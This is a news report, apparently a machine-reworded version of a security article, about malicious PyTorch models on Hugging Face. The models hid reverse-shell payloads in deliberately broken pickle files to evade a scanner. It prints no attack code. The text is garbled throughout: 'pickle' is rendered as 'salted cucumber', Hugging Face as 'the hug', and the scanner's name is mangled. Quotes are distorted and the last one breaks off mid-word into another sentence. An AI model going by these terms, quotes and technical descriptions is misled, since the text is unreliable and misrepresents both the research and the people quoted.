Cybersecurity researchers found two malicious machine learning models (ML) on the hug that used unusual “broken” salted cucumber files to avoid detection.
“Files of salted cucumbers extracted from the mentioned Pytorch archives showed malicious Python content at the beginning of the file,” Carl Zanka ReversingLabs Researcher – Note In a report that shared with Hacker News. “In both cases, the harmful load was a typical reverse platform reverse shell that connects to the tough code.”
The approach was named Nullifai because it provides attempts to solve The passage of existing guarantees Set to determine malicious models. Below were listed on the hug – below –
- Glockr1/Ballr7
- Someone-R-U0000/00000000000000000000000000
Models are believed to be the proof of the concept (POC) rather than the scenario of the active supply chain attack.
The format of the seasheration serialization used by the common ML models was repeatedly found To become a risk of safety, as it offers ways to execute arbitrary code as soon as they are loaded and deasserized.
Both models found by cybersecurity are stored in Pytorch format, which is nothing more than a compressed file of salted cucumbers. While Pytorch uses Zip format to default, the detected models were compressed using 7z format.
Thus, this behavior allowed models to fly under the radar and avoiding how to indicate with an angry Pickson, a tool used, hugging the face to identify suspicious pickles files.
“An interesting thing in this salted salted pickle is that the serialization of the object is the purpose of the saline file – it is broken shortly after the harmful useful load, which leads to the abandonment of the object decomposition,” the Zanka said.
Further analysis showed that such broken salted cucumber files can be partially desserized with a mismatch between piclexon and how desserization works, causing the malicious code to be performed, despite the fact that the tool throws an error message . Open source utility has been since updated To correct this error.
“The explanation of such behavior is that the desserization of the object is performed in the Pickle files consistently,” the Zanka said.
“Salted salted codes are executed as they meet, and until all the opcodes are executed or there is no impaired instruction. In the case of the detected model, the harmful useful load is inserted at the beginning of the stream of salted cucumb existing security scanning tools. “